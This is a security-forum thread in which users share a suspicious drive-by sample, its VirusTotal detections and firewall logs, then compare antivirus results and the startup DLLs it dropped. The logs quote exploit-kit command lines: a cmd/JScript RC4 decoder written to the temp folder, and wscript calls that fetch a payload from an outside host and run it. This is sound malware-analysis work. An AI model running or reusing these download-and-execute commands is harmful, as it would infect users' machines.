查看: 3613|回复: 20
收起左侧

[可疑文件] Detection ratio: 2 / 55 Exploit Toolkit 91 & Neutrino Exploit Kit 25 挂马

[复制链接]
墨家小子
发表于 2016-2-27 21:08:36 | 显示全部楼层 |阅读模式
SHA256:        9d1f19e228cecfb9464f71464690d774a4433d58fb82e159dd903a7963033dae
File name:        rad0DC0E.tmp.exe
Detection ratio:        2 / 55
Analysis date:        2016-02-27 13:02:43 UTC ( 1 minute ago )
https://www.virustotal.com/en/file/9d1f19e228cecfb9464f71464690d774a4433d58fb82e159dd903a7963033dae/analysis/1456578163/


Qihoo-360        QVM07.1.Malware.Gen        20160227
Rising        PE:Malware.XPACK-HIE/Heur!1.9C48 [F]        20160225


瑞星越来越……药店……不说了我是少先队员我不可以骂人











SSF拦截日志:

2016/2/27 20:57:12,C:\Program Files (x86)\Internet Explorer\iexplore.exe,53,Allowed ;执行应用程序 (cmd.exe /q /c cd /d "%tmp%" && echo function r(g,f){for(var c=0,k,b=[],e=[],a=0;256^>a;a++)b[a]=a;for(a=0;256^>a;a++)c=c+b[a]+f[v](a%f.length)^&255,k=b[a],b[a]=b[c],b[c]=k;for(var l=c=a=0;l^<g.length;l++)a=a+1^&255,c=c+b[a]^&255,k=b[a],b[a]=b[c],b[c]=k,e["\x7)

2016/2/27 20:57:22,C:\Windows\SysWOW64\cmd.exe,53,Allowed ;执行应用程序 (wscript  //B //E:JScript lket.tmp "snpbhmwxzn"
"http://bgnwa.aharold.top/1977/09/26/kitty/waistcoat/enough/peep-mile-decay-alive-splendid-drink-mock-pair-their-coal.html" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; .NET4.0E; .NET4.0C; Tablet PC 2)

2016/2/27 20:57:30,C:\Program Files (x86)\Internet Explorer\iexplore.exe,53,Allowed ;执行应用程序 (cmd.exe /q /c cd /d "%tmp%" && echo function r(g,f){for(var c=0,k,b=[],e=[],a=0;256^>a;a++)b[a]=a;for(a=0;256^>a;a++)c=c+b[a]+f[v](a%f.length)^&255,k=b[a],b[a]=b[c],b[c]=k;for(var l=c=a=0;l^<g.length;l++)a=a+1^&255,c=c+b[a]^&255,k=b[a],b[a]=b[c],b[c]=k,e["\x7)

2016/2/27 20:57:44,C:\Windows\SysWOW64\cmd.exe,53,Allowed ;执行应用程序 (wscript  //B //E:JScript ynol.tmp "snpbhmwxzn" "http://bgnwa.aharold.top/channel/brandy-37228179" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; .NET4.0E; .NET4.0C; Tablet PC 2.0; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALI)

2016/2/27 20:57:58,C:\Windows\SysWOW64\wscript.exe,48,Allowed ;出站网络访问

2016/2/27 20:58:01,C:\Windows\SysWOW64\wscript.exe,50,Allowed ;使用 DNS 解析服务访问网络
2016/2/27 20:58:03,C:\Windows\SysWOW64\wscript.exe,48,Allowed ;出站网络访问

2016/2/27 20:58:30,C:\Windows\SysWOW64\wscript.exe,53,Allowed ;执行应用程序 ("C:\Windows\System32\cmd.exe" /c rad0DC0E.tmp.exe)


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1经验 +15 收起 理由
绯色鎏金 + 15 版区有你更精彩: )

查看全部评分

rrorr
发表于 2016-2-27 21:13:28 | 显示全部楼层
HEU_AEGISCS941
墨家小子
 楼主| 发表于 2016-2-27 21:16:46 | 显示全部楼层
都发了一天,还看不到诺顿测试,谁懂我的伤悲,哎呀赶紧给我出一道5以内的加减法,看看脑袋有没有瑕疵
rrorr
发表于 2016-2-27 21:24:07 | 显示全部楼层
本帖最后由 rrorr 于 2016-2-27 21:30 编辑

ns22miss,检测到大量可疑出站通信,问是否启动NPE
ericdj
发表于 2016-2-27 21:25:56 | 显示全部楼层
墨家小子 发表于 2016-2-27 21:16
都发了一天,还看不到诺顿测试,谁懂我的伤悲,哎呀赶紧给我出一道5以内的加减法,看看脑袋有没有瑕疵[:340 ...

GD 来了~~

这货不允许偶在沙箱里双击
pal家族
发表于 2016-2-27 21:26:47 | 显示全部楼层
27.02.2016 21.26.33;Detected object (file) deleted.;C:\360安全浏览器下载\rad0DC0E.tmp\rad0DC0E.tmp.exe;C:\360安全浏览器下载\rad0DC0E.tmp\rad0DC0E.tmp.exe;UDS:DangerousPattern.Multi.Generic;Unknown threat;02/27/2016 21:26:33
JiroMochizuki
发表于 2016-2-27 21:27:04 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
墨家小子
 楼主| 发表于 2016-2-27 21:31:41 | 显示全部楼层
rrorr 发表于 2016-2-27 21:24
ns22miss,检测到大量可疑出站通信,问是否启动NPE

你注销一下看看
墨家小子
 楼主| 发表于 2016-2-27 21:32:00 | 显示全部楼层
rrorr 发表于 2016-2-27 21:24
ns22miss,检测到大量可疑出站通信,问是否启动NPE

顺便看看启动项
rrorr
发表于 2016-2-27 21:34:26 | 显示全部楼层
本帖最后由 rrorr 于 2016-2-27 21:48 编辑


我开NPE了,待会重新双击再注销
启动项这2个?
C:\Users\Administrator.PC\AppData\Local\tnkeyxv.dll
C:\Windows\system32\TPVMMon.dll

注销后再进没什么变化
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-7-24 01:01 , Processed in 0.143817 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表